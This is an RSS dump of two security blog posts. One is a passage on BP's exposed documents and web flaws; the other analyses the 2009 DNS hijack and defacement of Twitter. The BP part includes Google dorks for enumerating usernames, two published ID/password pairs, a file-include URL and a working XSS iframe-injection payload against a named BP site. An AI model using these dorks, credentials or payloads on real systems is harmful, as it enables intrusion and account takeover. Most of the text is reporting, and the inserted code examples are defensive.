<p><a href="http://www.google.com/#hl=en&amp;q=%22Documents+And+Settings%22+site%3Abp.com&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;gs_rfai=&amp;fp=dfdf66882bd03aae">http://www.google.com/#hl=en&amp;q=%22Documents+And+Settings%22+site%3Abp.com&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;gs_rfai=&amp;fp=dfdf66882bd03aae</a>.</p>

<p><div id="attachment_4067" class="wp-caption alignnone" style="width: 646px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_mydocs.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_mydocs.jpg" alt="" title="bp_mydocs" width="636" height="111" class="size-full wp-image-4067" /></a><p class="wp-caption-text">Username equals Warna3.</p></div>
<br /></p>

<p>Because a number of BP employees use the built-in MS Word footer option for file name and path, their user names have been exposed in publicly released documents. Once a number of usernames can be enumerated, it&#8217;s off to the races for an attacker with a brute force password cracker.</p>
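<p>The footer leak described above is easy to catch before a document is published. The following pre-publication check is an added example written for this post, not a tool from the original article or from BP; it scans the extracted text of documents for Windows profile paths and reports the user names they would expose. The document names, paths and user names are constructed sample data.</p>

```python
import re
from typing import Dict, List

# Word's "file name and path" footer embeds a Windows profile path such as
# C:\Documents and Settings\<user>\My Documents\report.doc. This pattern catches
# the XP-era profile root seen in the post and the Vista+ \Users root, and
# tolerates forward slashes, which some PDF converters emit.
_PROFILE_PATH = re.compile(
    r"[A-Za-z]:[\\/](?:Documents and Settings|Users)[\\/]([^\\/\r\n]+)",
    re.IGNORECASE,
)

# Profile folders that belong to the OS image rather than to a person.
_BUILTIN = {"all users", "default user", "default", "public", "administrator"}


def find_profile_paths(text: str) -> List[str]:
    """Return every Windows profile path fragment found in the document text."""
    return [m.group(0) for m in _PROFILE_PATH.finditer(text)]


def leaked_usernames(text: str) -> List[str]:
    """Return the distinct user names leaked via profile paths, in order of first appearance."""
    found: List[str] = []
    seen = set()
    for m in _PROFILE_PATH.finditer(text):
        user = m.group(1).strip()
        key = user.lower()
        if key in _BUILTIN or key in seen:
            continue
        seen.add(key)
        found.append(user)
    return found


def audit_documents(docs: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each document to the user names it leaks; documents that leak nothing are omitted."""
    report: Dict[str, List[str]] = {}
    for name, text in docs.items():
        users = leaked_usernames(text)
        if users:
            report[name] = users
    return report


# Constructed sample text standing in for the extracted text of three PDFs awaiting release.
SAMPLE_DOCS = {
    "safety_bulletin.pdf": (
        "Safety bulletin, page 4 of 4\n"
        "C:\\Documents and Settings\\jdoe42\\My Documents\\bulletins\\safety_bulletin.doc\n"
    ),
    "investor_update.pdf": (
        "Forward-looking statements ...\n"
        "Footer: C:/Users/Public/Documents/investor_update.docx\n"
        "Last edited from C:\\Users\\asmith\\Desktop\\investor_update.docx\n"
    ),
    "press_release.pdf": "For immediate release. No footer path in this one.\n",
}

if __name__ == "__main__":
    for doc, users in audit_documents(SAMPLE_DOCS).items():
        print(f"{doc}: leaks user name(s) {', '.join(users)}")
```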

<h4>Documents</h4>

<p>He then goes on to demonstrate that the publicly available sites have a sub-directory /STAGING which appears to hold semi-public documents (press releases, investor releases, etc.).</p>

<p><a href="http://www.google.com/#q=site:bp.com+inurl:staging+%222010%22&amp;hl=en&amp;start=0&amp;sa=N&amp;fp=dfdf66882bd03aae">http://www.google.com/#q=site:bp.com+inurl:staging+%222010%22&amp;hl=en&amp;start=0&amp;sa=N&amp;fp=dfdf66882bd03aae</a></p>

<p>It&#8217;s unclear whether anything unusual is publicly exposed here. One document, showing the oil spill projections, is marked &#8220;official use only&#8221;; however, that&#8217;s a lot like saying something is under copyright but still releasable. Another is marked &#8220;Project Confidential&#8221;, but it&#8217;s unclear whether it shed that classification when it was added to the /STAGING site.</p>

<p><div id="attachment_4086" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_situationmap.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_situationmap.jpg" alt="" title="bp_situationmap" width="750" height="579" class="size-full wp-image-4086" /></a><p class="wp-caption-text">Situation Map.</p></div>
<br /></p>

<p>As with a lot of large companies, there&#8217;s probably more online than there should be, but /STAGING doesn&#8217;t appear to have any special significance as an intranet type site. I will confess, this is my favorite document, <a href="http://docs.google.com/viewer?a=v&amp;q=cache:O4zm5Oi8orsJ:www.bp.com/liveassets/bp_internet/globalbp/STAGING/global_assets/downloads/H/horizon_magazine_issue_2_april_2008.pdf+site:bp.com+inurl:staging+%222010%22+confidential&amp;hl=en&amp;gl=us&amp;pid=bl&amp;srcid=ADGEESj2qEnWcCOF8SWSE5Ikgv1JZDNi2DCJMt93uwf0BsHNct0gjaJcG0ymZucQ0kPIP5GbvWPemQ_7Y2Ddb76Ibx9-SU2hJfKB2wxvy-IXZAEhzJXqhWSKavmJCLcSAvBPxlUSw5EL&amp;sig=AHIEtbSyg7hGwgwf5flxBZmau3Amuc-x_A">the April 2008 company magazine</a>:</p>

<p><div id="attachment_4087" class="wp-caption alignnone" style="width: 495px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_horizon.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_horizon.jpg" alt="" title="bp_horizon" width="485" height="649" class="size-full wp-image-4087" /></a><p class="wp-caption-text">BP Horizon: The Battle to Secure Company Data.</p></div>
<br /></p>

<h4>Some Passwords</h4>

<p>Two of the files, a form and a newsletter, contain old passwords; both are for ibackup.com access, which, like other document sharing sites, has a public folder concept. Given their age, there probably isn&#8217;t much of an issue here; however, password re-use inside organizations is quite common.</p>

<p>ID: bproadmap<br />
PW: safety<br />
<a href="http://www.bp.com/liveassets/bp_internet/bp_canada_noel/bp_canada_noel_english/STAGING/local_assets/downloads_pdfs/j/journey_hazard_assessment_card_2009_02_18.pdf">journey_hazard_assessment_card_2009_02_18.pdf</a></p>

<p>ID: bpshipping02<br /> 
PW: flag01<br />
<a href="http://docs.google.com/viewer?a=v&amp;q=cache:6nzmWJJpB3kJ:www.bp.com/liveassets/bp_internet/bp_shipping/bp_shipping_english/STAGING/local_assets/downloads_pdfs/f/Flag_29_May_2008.pdf+site:bp.com+inurl:staging+password&amp;hl=en&amp;gl=us&amp;pid=bl&amp;srcid=ADGEESieFMPdmCO_hNW2MSA4pu7K_bGkmXjhna1KtQNEWiMcdfmOrm658QSkwKVIfO5rFFkOWkFPe8kq9ZssmL_XQ8K4Hdbkm409NGT_A0c0yVynORfFiqQLXNNTgaArMHygEpG9KCix&amp;sig=AHIEtbT7TxhK88zxrqpdVTepx1Z8nH_lhA">Flag_29_May_2008.pdf</a></p>

<p>In the case of the second id, it certainly looks to be the kind of id and password that gets incremented for different things (bpshipping01, bpshipping03, flag02).</p>

<h3>PHP File Include and XSS</h3>

<p>Finally, the Reddit commenter points out the energiser.bp.com URL as one that appears to be a web application with a few issues, including potentially a PHP remote file include or arbitrary file access:</p>

<p>http://energiser.bp.com/help.php?module=moodle&amp;file=insert file here</p>

<p>The site appears to use Moodle, a popular CMS platform, so that&#8217;s something else that can be looked at. However, <a href="http://www.xssed.com/mirror/67152/">holisticinfosec got there first</a>, and best, with an XSS based iFrame injection:</p>

<pre><code>http://energiser.bp.com/login/index.php?lang=%22%3E%3Ciframe%20src=http://www.tampabay.com/multimedi
a/archive/00121/SP_322824_BORC_oilp_121445c.jpg%20width=450%20height=300%20frameborder=0%20scroll=no
%3E%3C/%3E%3C/;document.write%28unescape%28a.source%29%29;{//
</code></pre>

<p><div id="attachment_4071" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_xss1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bp_xss1.jpg" alt="" title="bp_xss" width="750" height="707" class="size-full wp-image-4071" /></a><p class="wp-caption-text">iFrame inclusion on a bp.com site.</p></div>
<br /></p>

<h3>Finally</h3>

<p>Is most of this nonsense from a hard core security standpoint? Yes, to an extent. The XSS ought to be corrected, and dual factor authentication on VPNs is kind of a must have at this point.</p>

<p>Does BP need a security audit of their perimeter, web properties, online services used, and security policies? Also yes. Maybe schedule it after they plug that gushing oil geyser this August.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/">Newsweek Reports Zombie Invasion</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/">Congressional Web Site Defacements Follow the State of the Union</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/umm-techcrunch-defacement-two-in-24-hours/">Umm&#8230;TechCrunch? Defacement Two in 24 Hours</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/techcrunched-techcrunch-the-victim-of-a-defacement/">TechCrunched &#8211; TechCrunch the Victim of a Defacement</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/baidu-com-the-latest-victim-of-iranian-cyberarmy/">Baidu.com the Latest Victim of Iranian CyberArmy</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/going-after-bp/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>We shall strike if the leader orders: Twitter Struck by Iranian Cyber Army</title>
		<link>http://praetorianprefect.com/archives/2009/12/we-shall-strike-if-the-leader-orders-twitter-struck-by-iranian-cyber-army/</link>
		<comments>http://praetorianprefect.com/archives/2009/12/we-shall-strike-if-the-leader-orders-twitter-struck-by-iranian-cyber-army/#comments</comments>
		<pubDate>Thu, 17 Dec 2009 16:32:07 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Web Site Defacement]]></category>
		<category><![CDATA[hacktivism]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=2500</guid>
		<description><![CDATA[At some time around 10pm on Thursday, users going to Twitter.com were served the page below with a banner reading "This site has been hacked by the Iranian Cyber Army". Also, mowjcamp.org, a site for supporters of Mir-Hossein Mousavi Khameneh a candidate who ran against Mahmoud Ahmadinejad in the 2009 Iranian presidential election, has been serving a similar defacement since at least December 16th and continues to do so. The motive appears to be activism in support of Iran's current Islamic regime. The attack vector was a bad actor using an id and password assigned to Twitter to log in to the <a href="https://dyn.com/user">administrative portal</a> of managed DNS service provider <a href="http://dyn.com/">Dyn</a>.]]></description>
			<content:encoded><![CDATA[<p>Fully updated: 12/18/09</p>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/iran_thumbnail.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/iran_thumbnail-150x150.jpg" alt="iran_thumbnail" title="iran_thumbnail" width="150" height="150" class="alignleft size-thumbnail wp-image-2501" /></a></p>

<p>At some time around 10pm on Thursday, users going to Twitter.com were served the page below with a banner reading &#8220;This site has been hacked by the Iranian Cyber Army&#8221;. Also, mowjcamp.org, a site for supporters of Mir-Hossein Mousavi Khameneh, a candidate who ran against Mahmoud Ahmadinejad in the 2009 Iranian presidential election, has been serving a similar defacement since at least December 16th and continues to do so. The motive appears to be activism in support of Iran&#8217;s current Islamic regime. The attack vector was a bad actor using an id and password assigned to Twitter to log in to the <a href="https://dyn.com/user">administrative portal</a> of managed DNS service provider <a href="http://dyn.com/">Dyn</a>.</p>

<p><div id="attachment_2502" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/Twitteriran.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/Twitteriran-300x298.jpg" alt="The page served to users visiting twitter.com as it appeared earlier." title="Twitteriran" width="300" height="298" class="size-medium wp-image-2502" /></a><p class="wp-caption-text">The page served to users visiting twitter.com as it appeared earlier.</p></div>
<br /></p>

<p>Twitter actually had <a href="http://www.nytimes.com/external/idg/2009/06/18/18idg-twitter-plays-key-role-in-dos-attacks-in-iran-33328.html">a prominent role</a> in protests following the disputed Iranian presidential elections, and was a key source for Iranian citizens to both receive and disseminate information during the country&#8217;s widespread protests. The targeting of both the opposition candidate and the Twitter platform therefore looks related to the period following the election. Such digital attacks for political purposes are sometimes referred to as <a href="http://en.wikipedia.org/wiki/Hacktivism">hacktivism</a>, usually defined as &#8220;the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends&#8221;.</p>

<p>The site description in Google which temporarily indexed Twitter with the defacement seems to confirm this motive. The text reads: “In the name of God, As an Iranian this is a reaction to Twitter’s interference sly which was U.S. authorities ordered in the internal affairs of my country…”.</p>

<p><div id="attachment_2505" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/google-twitter.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/google-twitter-300x170.png" alt="Google&#039;s short lived indexing of the defaced twitter.com." title="google-twitter" width="300" height="170" class="size-medium wp-image-2505" /></a><p class="wp-caption-text">Google's short lived indexing of the defaced twitter.com.</p></div>
<br /></p>

<p>The page contains an e-mail address (I guess the &#8220;Iranian Cyber Army&#8221; is accepting feedback), an image of a flag with Arabic words, and an English message at the bottom as follows:</p>

<pre><code>U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And 
Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST ;)
Take Care.
</code></pre>

<p>We think it&#8217;s nice they asked us to take care.</p>

<h3>Attack Vector</h3>

<p>Twitter uses a hosted managed DNS service from <a href="http://dyn.com/dynect">Dyn, Inc</a>, a New Hampshire firm, for their domain names. According to <a href="http://www.who.is/domain_archive-com/twitter.com/">WHO.IS</a>, they have been using this service since February of 2009. Dyn&#8217;s Chief Technology Officer, Tom Daly, has stated that someone using a &#8220;set of valid Twitter credentials&#8221; made the DNS changes that affected Twitter.</p>

<p>So they would have logged in here:</p>

<p><div id="attachment_2544" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/Screen-shot-2009-12-18-at-3.32.08-PM1.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/Screen-shot-2009-12-18-at-3.32.08-PM1-300x133.png" alt="Dyn Login Screen" title="Screen-shot-2009-12-18-at-3.32.08-PM" width="300" height="133" class="size-medium wp-image-2544" /></a><p class="wp-caption-text">Dyn Login Screen</p></div>
<br /></p>

<p>Then they would have been presented with a page like this (here&#8217;s ours as an example, all public information), and could modify where the domain name points:</p>

<p><div id="attachment_2545" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/Screen-shot-2009-12-18-at-5.38.30-PM.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/Screen-shot-2009-12-18-at-5.38.30-PM-300x164.png" alt="Example screen where DNS records are edited." title="Screen shot 2009-12-18 at 5.38.30 PM" width="300" height="164" class="size-medium wp-image-2545" /></a><p class="wp-caption-text">Example screen where DNS records are edited.</p></div>
<br /></p>

<h3>Dyn Responds</h3>

<ul>
<li><i>&#8220;It was not a failing on our systems whatsoever.&#8221; </i>

<ul>
<li>Tom Daly, Dyn CTO</li>
</ul></li>
<li><i>&#8220;This was not an unauthorized breach of our system.&#8221;</i></li>
<li>On Twitter&#8217;s explanation <i>&#8220;It will fully exonerate us, that&#8217;s one thing I can say,&#8221;</i></li>
<li>On whether Twitter&#8217;s credentials were stolen by hackers: <i>&#8220;You&#8217;ll have to read between the lines,&#8221;</i>

<ul>
<li>Kyle York, Dyn VP of Marketing</li>
</ul></li>
</ul>

<p>Well, those are examples of a strong statement combined with playing semantics. Dyn hosts DNS for a number of major web properties, such as ArcSight, Zappos, Subway, and British Telecom. While many other managed DNS services do the same thing, requiring only a web form with id and password authentication is probably not a good way to protect DNS records.</p>

<p>As an example of where to go from here, the online video game World of Warcraft offers $6.50 physical one time password (OTP) tokens used to authenticate in order to play:</p>

<p><div id="attachment_2547" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/blizzard_authenticator-222x300.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/blizzard_authenticator-222x300-150x150.jpg" alt="OTP token to authenticate, to World of Warcraft." title="blizzard_authenticator-222x300" width="150" height="150" class="size-thumbnail wp-image-2547" /></a><p class="wp-caption-text">OTP token to authenticate, to World of Warcraft.</p></div>
<br /></p>

<p>Many of you log into your corporate virtual private networks with similar OTP tokens, issued by firms such as RSA.</p>

<p>So your company protects its internal network with dual factor authentication. Many web sites and web services, such as World of Warcraft or eTrade, protect the individual user with the same. Why doesn&#8217;t Twitter require their managed DNS provider to protect the primary product of their $1 billion valuation company with the same?</p>

<p>We&#8217;ve also asked Dyn twice, without response, for the GeoIP location of the attacker who used Twitter&#8217;s credentials to update the DNS entry.</p>

<h4>How did they get Twitter&#8217;s Login for the Site?</h4>

<p>I don&#8217;t know, and there&#8217;s been a lot of speculation. But looking for evidence of something that has changed? DynStatus reported on Friday that, &#8220;due to increased security concerns&#8230;we have disabled access to our e-mail based password reset system, to prevent compromise of customer login credentials via e-mail systems.&#8221;</p>

<p>So potentially the password reset function was subverted, either by someone with access to the Twitter e-mail account that password reset e-mails are sent to, or by a flaw in the password reset functionality on the web site itself.</p>

<p><div id="attachment_2548" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/dyn_status.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/dyn_status-300x169.jpg" alt="E-mail based password resets suspended, as of today, by Dyn." title="dyn_status" width="300" height="169" class="size-medium wp-image-2548" /></a><p class="wp-caption-text">E-mail based password resets suspended, as of today, by Dyn.</p></div>
<br /></p>

<p>Was e-mail access absolutely required to subvert a password reset? Of course not. As an example, the site has some of the source HTML usually associated with sites built with the Drupal CMS, which has had past issues with attacks on its password reset function: <a href="http://www.securityhome.eu/exploits/exploit_pdf.php?eid=127727419649b1ab314e5984.24334605">drupal-passwdxss.txt</a>. We&#8217;re not saying that&#8217;s what this is, but we are pointing out that until Twitter comes forward, no one knows whether a Twitter staff e-mail account has been compromised.</p>

<h3>What&#8217;s the Flag Say?</h3>

<p>Relying on the translations of others (we don&#8217;t speak Arabic or Farsi), the flag contains a message of &#8220;<a href="http://en.wikipedia.org/wiki/Hezbollah">Hezbollah</a> is victorious&#8221; at the top, referring to the paramilitary organization in Lebanon supported by Iran which in 2006 engaged in a 34 day military conflict with Israel.</p>

<p>The next word is the name of the third Shi&#8217;i Imam, <a href="http://en.wikipedia.org/wiki/Imam_Husayn">Imam Husayn</a>.  Finally at the bottom there is a poem that reads: &#8220;We shall strike if the leader orders, we shall lose our heads if the leader wishes.&#8221;</p>

<p>Based on the material displayed, there is speculation that the cracker(s) belong to a Shiite group.</p>

<h3>Twitter.com Serving the Page from the Wrong IP</h3>

<p>At some point during last night&#8217;s defacement, people started noting that the content for the domain twitter.com was being served from IP address 66.147.242.88. This IP address is tied to Bluehost and, according to GeoIP, is a web server in Provo, Utah. The IP is still hosting a similar defacement page at the time of writing at: <a href="http://66.147.242.88/~twitter9/index.htm">http://66.147.242.88/~twitter9/index.htm</a>.</p>

<p><div id="attachment_2503" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/twitter9.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/twitter9-300x240.jpg" alt="Page returned from http://66.147.242.88/~twitter9/index.htm." title="twitter9" width="300" height="240" class="size-medium wp-image-2503" /></a><p class="wp-caption-text">Page returned from http://66.147.242.88/~twitter9/index.htm.</p></div>
<br /></p>

<p>This version has a few sentences in Farsi at the bottom instead of the English message; Google translates these as:</p>

<pre><code>Name of God
As an Iranian response to this intervention sly server command in the internal affairs of my country
 and American authorities)
This site is a warning Hk
</code></pre>

<p>If any native speakers who can read this want to help us with the translation, the comments are open below.</p>

<h3>The Attack &#8211; Theories from Last Night Worth Explaining</h3>

<h4>DNS Cache Poisoning?</h4>

<p>Twitter&#8217;s Biz Stone put out an update <a href="http://blog.twitter.com/2009/12/dns-disruption.html">on their blog</a> indicating that Twitter&#8217;s DNS records &#8220;were temporarily compromised&#8221;. That led to speculation that the culprit was <a href="http://en.wikipedia.org/wiki/DNS_cache_poisoning">DNS Cache Poisoning</a>. An explanation of DNS Cache Poisoning could easily make its own blog post, so we&#8217;ll keep it brief here.</p>

<p>Essentially, a domain name server translates a domain name (www.google.com) into the IP address used to reach the requested resource on the Internet. Caching name servers normally rely on data served by the authoritative DNS servers for a domain, basically a hierarchy of who listens to whom. When a bad actor (or possibly an unintended mistake) is able to get bad data accepted by a caching name server, that name server is considered poisoned. The bad data is cached and served for future requests, and now may contain a record that diverts a domain name (www.google.com) to an IP address owned not by Google but by the bad actor.</p>

<p>A cache is a copy of original data stored elsewhere, kept to speed up repeated requests for the same resource. Confused? There is a decent video below explaining an attack scenario in which the DNS server receives a lookup request from a bad actor, who then floods the DNS server with forged name resolution data. The bad resolution of the domain is saved in the cache, and subsequent users are sent to the wrong IP address; for example, requests for twitter.com may be sent to an IP address in Utah serving up Iranian political propaganda.</p>

<h3>Basic Explanation of DNS Cache Poisoning</h3>

<p>Check Point put out a video last year that gives what is a very high level explanation of what happens in a DNS Cache Poisoning attack. If you&#8217;re not familiar with this type of attack, it might be useful:</p>

<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/1d1tUefYn4U&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/1d1tUefYn4U&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
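<p>To make the cache poisoning scenario above concrete from the resolver&#8217;s side, here is a toy caching resolver written for this post (an added example, not code from the original article, from Dyn or from any real resolver). It shows the checks a resolver applies before believing an answer: transaction id, source port, responding server, question section and bailiwick. A forged packet has to pass every one of them; the weak mode shows what happens when only the 16-bit transaction id is checked from a fixed port. All addresses and names are constructed.</p>

```python
import random
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class Query:
    txid: int        # 16-bit DNS transaction id
    src_port: int    # UDP source port the query was sent from
    qname: str       # question name, e.g. "twitter.com."
    upstream: str    # address of the server the query was sent to


@dataclass(frozen=True)
class Response:
    txid: int
    dst_port: int    # port the response was addressed to
    qname: str       # question section echoed back by the responder
    answer_name: str # owner name of the A record in the answer section
    answer_ip: str
    source: str      # address the response arrived from


def in_bailiwick(name: str, qname: str) -> bool:
    """Simplified bailiwick rule: the answer may only describe the queried name or a name below it."""
    return name == qname or name.endswith("." + qname)


class CachingResolver:
    """Toy caching resolver: an answer is cached only if it matches an outstanding query."""

    def __init__(self, strict: bool = True, rng: Optional[random.Random] = None):
        self.strict = strict
        self.rng = rng or random.Random()
        self.pending: Dict[Tuple[int, int], Query] = {}
        self.cache: Dict[str, str] = {}

    def send_query(self, qname: str, upstream: str) -> Query:
        """Record an outstanding query. Strict mode randomises the source port; weak mode always uses 53."""
        port = self.rng.randrange(1024, 65536) if self.strict else 53
        q = Query(self.rng.randrange(0, 65536), port, qname, upstream)
        self.pending[(q.txid, q.src_port)] = q
        return q

    def accept_response(self, r: Response) -> Tuple[bool, str]:
        """Validate a response against the pending queries; cache it only if every check passes."""
        q = self.pending.get((r.txid, r.dst_port))
        if q is None:
            return False, "no outstanding query with this txid/port"
        if self.strict:
            if r.source != q.upstream:
                return False, "response from a server we never asked"
            if r.qname != q.qname:
                return False, "question section does not match our query"
            if not in_bailiwick(r.answer_name, q.qname):
                return False, "answer name outside the queried zone"
        del self.pending[(r.txid, r.dst_port)]
        self.cache[r.answer_name] = r.answer_ip
        return True, "cached"


UPSTREAM = "198.51.100.53"   # constructed: the authoritative server we query
ROGUE = "203.0.113.1"        # constructed: the address the forged packets come from


def strict_demo() -> Tuple[Dict[str, Tuple[bool, str]], Dict[str, str]]:
    """Feed a strict resolver four forged answers and one genuine one; return the verdicts and the cache."""
    resolver = CachingResolver(strict=True, rng=random.Random(7))
    q = resolver.send_query("twitter.com.", UPSTREAM)
    other_port = (q.src_port % 65535) + 1   # any port that is not the one we used
    forged = {
        "wrong txid": Response((q.txid + 1) % 65536, q.src_port, q.qname, q.qname, "203.0.113.66", ROGUE),
        "wrong port": Response(q.txid, other_port, q.qname, q.qname, "203.0.113.66", ROGUE),
        "wrong source": Response(q.txid, q.src_port, q.qname, q.qname, "203.0.113.66", ROGUE),
        "out of bailiwick": Response(q.txid, q.src_port, q.qname, "example.org.", "203.0.113.66", UPSTREAM),
    }
    verdicts = {label: resolver.accept_response(r) for label, r in forged.items()}
    genuine = Response(q.txid, q.src_port, q.qname, q.qname, "192.0.2.10", UPSTREAM)
    verdicts["genuine"] = resolver.accept_response(genuine)
    return verdicts, resolver.cache


def weak_demo() -> bool:
    """A resolver that matches on txid alone, from a fixed port, caches a record it never asked about."""
    resolver = CachingResolver(strict=False)
    q = resolver.send_query("twitter.com.", UPSTREAM)
    # The forger still has to hit the 16-bit txid, which is why the fixed port matters so much.
    forged = Response(q.txid, 53, q.qname, "example.org.", "203.0.113.66", ROGUE)
    ok, _ = resolver.accept_response(forged)
    return ok and resolver.cache.get("example.org.") == "203.0.113.66"


if __name__ == "__main__":
    verdicts, cache = strict_demo()
    for label, (ok, why) in verdicts.items():
        print(f"{label:16s} -> {'accepted' if ok else 'rejected'}: {why}")
    print("cache:", cache)
    print("weak resolver poisoned:", weak_demo())
```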

<h4>DNS Hijacking?</h4>

<p>Another site suggested the problem might be DNS Hijacking. A DNS server is essentially used to translate domain names to IP addresses, basically because domain names are easier to remember when accessing Internet connected resources. While most users depend on DNS servers hosted by their ISP (and in turn by the providers it relies on), it is possible for a bad actor to host a rogue DNS server, point the domains of legitimate web sites to IP addresses hosting a bogus web site, for example, and attempt via malicious code on the PC to change the user&#8217;s DNS server assignment. When a bad actor attempts to redirect users from a legitimate web site to a bogus one, it&#8217;s usually referred to as pharming.</p>

<h3>mowjcamp.org</h3>

<p>Recall we mentioned earlier that Twitter is the second site we&#8217;re aware of to be defaced in the same way. The site <a href="http://mowjcamp.com/">mowjcamp.org</a>, a political rally web site supporting former Iranian opposition candidate <a href="http://en.wikipedia.org/wiki/Mir-Hossein_Mousavi#2009_Presidential_election">Mir-Hossein Mousavi Khameneh</a>, is at the time of writing actively serving a defacement page similar to the one that was on Twitter, from the IP address 66.147.244.182. This IP is also associated with the ISP Bluehost, and GeoIP also points back to Provo, Utah for its location.</p>

<p>The first screenshot is what mowjcamp.org is supposed to look like, and can be viewed directly at the IP address: <a href="http://174.129.25.248">http://174.129.25.248</a>.</p>

<div id="attachment_2507" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/mawjcamporg21.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/mawjcamporg21-300x239.jpg" alt="What mowjcamp.org is supposed to look like." title="mawjcamporg2" width="300" height="239" class="size-medium wp-image-2507" /></a><p class="wp-caption-text">What mowjcamp.org is supposed to look like.</p></div>

<div id="attachment_2508" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/mawjcamporg1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/mawjcamporg1-300x239.jpg" alt="What mowjcamp.org looks like now." title="mawjcamporg1" width="300" height="239" class="size-medium wp-image-2508" /></a><p class="wp-caption-text">What mowjcamp.org looks like now.</p></div>

<h3>Twitter Responds</h3>

<p>So, as we mentioned earlier, Twitter had this to say last night:</p>

<pre><code>12/17/09 11:43 PM
As we tweeted a bit ago, Twitter's DNS records were temporarily compromised tonight but have now been fixed.
 As some noticed, Twitter.com was redirected for a while but API and platform applications were working. 
We will update with more information and details once we've investigated more fully.
</code></pre>

<p>And then today posted this update:</p>

<pre><code>12/18/09 1:33 PM
Update on Last Night's DNS Disruption
Domain Name System or DNS is an Internet protocol used to translate IP addresses into domain names so 
instead of typing in a long string of numbers we can enter urls like www.twitter.com into a browser to visit 
our favorite web sites. Last night, DNS settings for the Twitter web site were hijacked. 
From 9:46pm to 11pm PST, approximately 80% of Traffic to Twitter.com was redirected to other web sites. 
We tweeted, blogged, and updated our status page last night.

During the attack, we were in direct contact with our DNS provider, Dynect. We worked closely to reset our 
DNS as quickly as possible. The motive for this attack appears to have been focused on defacing our site, 
not aimed at users—we don't believe any accounts were compromised. If you're concerned that your 
account could have been affected in some way, feel free to contact us, accountsafe [at] twitter.com.
</code></pre>

<p>As is always the case, the updates are short on meaningful information, providing a recap of what we already read elsewhere, leaving out any indication of how the bad actor or actors got the login credentials for Dyn, and giving no indication of what might be corrected to prevent this going forward.</p>

<h3>Bluehost Responds</h3>

<p><i>Bluehost discovered that Twitter.com had been the victim of a DNS compromise and, further, that the attackers had redirected some of the Twitter traffic to an account hosted on Bluehost servers. This customer account on BlueHost was setup using a stolen identity and credit card, as determined by the Bluehost verification department. The Bluehost abuse department immediately terminated this account. Contact was made by Bluehost to law enforcement agents to assist in all ongoing investigations.</i></p>

<p>It is somewhat strange that their monitoring did not notice a web site that went from zero to millions of visits in minutes.</p>

<h3>Hysteria</h3>

<p>The coverage coming out of this incident is riotous:</p>

<p><i>Thursday night&#8217;s cyber attack against the Twitter microblogging service was no routine assault to bring down a website. It was a sophisticated online blitz &#8211; perhaps part of an online Iranian cybercampaign &#8211; that could prove costly for social media networks.</i></p>

<p><a href="http://www.csmonitor.com/Money/2009/1218/Iranian-hacker-attack-What-will-it-cost-Twitter">http://www.csmonitor.com/Money/2009/1218/Iranian-hacker-attack-What-will-it-cost-Twitter</a></p>

